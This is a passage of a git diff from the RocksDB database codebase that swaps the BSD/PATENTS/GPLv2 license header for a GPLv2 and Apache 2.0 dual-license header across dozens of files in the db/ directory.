 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/column_family.cc b/db/column_family.cc
index e32c653686c..b00eda0747d 100644
--- a/db/column_family.cc
+++ b/db/column_family.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/column_family.h b/db/column_family.h
index 9a6f15d3ca6..3a807d22b91 100644
--- a/db/column_family.h
+++ b/db/column_family.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/column_family_test.cc b/db/column_family_test.cc
index 7621f3974ee..0d5f2dcf232 100644
--- a/db/column_family_test.cc
+++ b/db/column_family_test.cc
@@ -1,8 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in
-// the LICENSE file in the root directory of this source tree. An
-// additional grant of patent rights can be found in the PATENTS file
-// in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc
index 3dc9aac3a98..5aad6114f5e 100644
--- a/db/compact_files_test.cc
+++ b/db/compact_files_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #ifndef ROCKSDB_LITE

diff --git a/db/compacted_db_impl.cc b/db/compacted_db_impl.cc
index 955d8bc3bc0..d1007d972a1 100644
--- a/db/compacted_db_impl.cc
+++ b/db/compacted_db_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #ifndef ROCKSDB_LITE
 #include "db/compacted_db_impl.h"
diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h
index ec8ea2baa87..de32f21e681 100644
--- a/db/compacted_db_impl.h
+++ b/db/compacted_db_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once
 #ifndef ROCKSDB_LITE
diff --git a/db/compaction.cc b/db/compaction.cc
index bb2384a3598..ea2c011a45c 100644
--- a/db/compaction.cc
+++ b/db/compaction.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compaction.h b/db/compaction.h
index 0167b16f4c4..7be6df2c1e8 100644
--- a/db/compaction.h
+++ b/db/compaction.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compaction_iteration_stats.h b/db/compaction_iteration_stats.h
index 2725b4b33df..52a666e4e21 100644
--- a/db/compaction_iteration_stats.h
+++ b/db/compaction_iteration_stats.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once

diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc
index a89d16fccd8..c59e734ca26 100644
--- a/db/compaction_iterator.cc
+++ b/db/compaction_iterator.cc
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include "db/compaction_iterator.h"
 #include "rocksdb/listener.h"
diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h
index 10f13fd139d..54c4bc249c8 100644
--- a/db/compaction_iterator.h
+++ b/db/compaction_iterator.h
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #pragma once
 #include
diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc
index 3f2ad6e4ed7..b625c99ffaa 100644
--- a/db/compaction_iterator_test.cc
+++ b/db/compaction_iterator_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
#include "db/compaction_iterator.h" diff --git a/db/compaction_job.cc b/db/compaction_job.cc index 407671e85a1..636cdbea183 100644 --- a/db/compaction_job.cc +++ b/db/compaction_job.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job.h b/db/compaction_job.h index c230584917c..6ca5d627a75 100644 --- a/db/compaction_job.h +++ b/db/compaction_job.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job_stats_test.cc b/db/compaction_job_stats_test.cc index dc2fc0fef62..9a8372f5785 100644 --- a/db/compaction_job_stats_test.cc +++ b/db/compaction_job_stats_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/compaction_job_test.cc b/db/compaction_job_test.cc index 102401364fb..cace1814ad8 100644 --- a/db/compaction_job_test.cc +++ b/db/compaction_job_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #ifndef ROCKSDB_LITE

diff --git a/db/compaction_picker.cc b/db/compaction_picker.cc
index fc6a8a8da86..6795227b5c9 100644
--- a/db/compaction_picker.cc
+++ b/db/compaction_picker.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compaction_picker.h b/db/compaction_picker.h
index eb5f06819b6..f44139c2dd9 100644
--- a/db/compaction_picker.h
+++ b/db/compaction_picker.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc
index 5fb3db0a9e8..2e34e9ab277 100644
--- a/db/compaction_picker_test.cc
+++ b/db/compaction_picker_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include "db/compaction_picker.h"
 #include
diff --git a/db/compaction_picker_universal.cc b/db/compaction_picker_universal.cc
index 91ed40586de..ce480267c44 100644
--- a/db/compaction_picker_universal.cc
+++ b/db/compaction_picker_universal.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/compaction_picker_universal.h b/db/compaction_picker_universal.h
index cbd2e871f26..3f2bed3e621 100644
--- a/db/compaction_picker_universal.h
+++ b/db/compaction_picker_universal.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/comparator_db_test.cc b/db/comparator_db_test.cc
index 878acd0d5a4..8ba800f22f9 100644
--- a/db/comparator_db_test.cc
+++ b/db/comparator_db_test.cc
@@ -1,11 +1,9 @@
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #include
 #include
diff --git a/db/convenience.cc b/db/convenience.cc
index a2ce8893e0d..cc5d9524839 100644
--- a/db/convenience.cc
+++ b/db/convenience.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 Facebook.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/corruption_test.cc b/db/corruption_test.cc
index f0bc3fdf3e8..f9ab8302c0a 100644
--- a/db/corruption_test.cc
+++ b/db/corruption_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/cuckoo_table_db_test.cc b/db/cuckoo_table_db_test.cc
index 57e75aa1c8d..e7c2d279a4d 100644
--- a/db/cuckoo_table_db_test.cc
+++ b/db/cuckoo_table_db_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).

 #ifndef ROCKSDB_LITE

diff --git a/db/db_basic_test.cc b/db/db_basic_test.cc
index 5427a08f57d..3d732f573ad 100644
--- a/db/db_basic_test.cc
+++ b/db/db_basic_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_block_cache_test.cc b/db/db_block_cache_test.cc
index 5eaf6793277..317597cb637 100644
--- a/db/db_block_cache_test.cc
+++ b/db/db_block_cache_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_bloom_filter_test.cc b/db/db_bloom_filter_test.cc
index 5d267776fa4..e6248a04014 100644
--- a/db/db_bloom_filter_test.cc
+++ b/db/db_bloom_filter_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_compaction_filter_test.cc b/db/db_compaction_filter_test.cc
index a2534d259d0..9f751f059fa 100644
--- a/db/db_compaction_filter_test.cc
+++ b/db/db_compaction_filter_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc
index f48942939f2..4c7da8d1b50 100644
--- a/db/db_compaction_test.cc
+++ b/db/db_compaction_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_dynamic_level_test.cc b/db/db_dynamic_level_test.cc
index ec7a40aa1d1..f968e7fc057 100644
--- a/db/db_dynamic_level_test.cc
+++ b/db/db_dynamic_level_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_encryption_test.cc b/db/db_encryption_test.cc
index 49c432f390d..38eee56459e 100644
--- a/db/db_encryption_test.cc
+++ b/db/db_encryption_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "db/db_test_util.h"
 #include "port/stack_trace.h"
diff --git a/db/db_filesnapshot.cc b/db/db_filesnapshot.cc
index 97a9e8bbe6f..24ddd4af4ef 100644
--- a/db/db_filesnapshot.cc
+++ b/db/db_filesnapshot.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 Facebook.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_flush_test.cc b/db/db_flush_test.cc
index 1cd26b59a0d..107e82467cb 100644
--- a/db/db_flush_test.cc
+++ b/db/db_flush_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl.cc b/db/db_impl.cc
index 06b5e09ef51..f770b51ae7f 100644
--- a/db/db_impl.cc
+++ b/db/db_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl.h b/db/db_impl.h
index 22ce36fd352..bc2072d7e96 100644
--- a/db/db_impl.h
+++ b/db/db_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc
index dac9f2c93d4..68d2831233b 100644
--- a/db/db_impl_compaction_flush.cc
+++ b/db/db_impl_compaction_flush.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc
index 81462a61ee7..9f4fccabc42 100644
--- a/db/db_impl_debug.cc
+++ b/db/db_impl_debug.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_experimental.cc b/db/db_impl_experimental.cc
index 08213dfd169..0d010758e6e 100644
--- a/db/db_impl_experimental.cc
+++ b/db/db_impl_experimental.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_files.cc b/db/db_impl_files.cc
index d34f4640220..3bbf94c293b 100644
--- a/db/db_impl_files.cc
+++ b/db/db_impl_files.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/db_impl_open.cc b/db/db_impl_open.cc
index e8d8c91066f..bc94b6095f1 100644
--- a/db/db_impl_open.cc
+++ b/db/db_impl_open.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
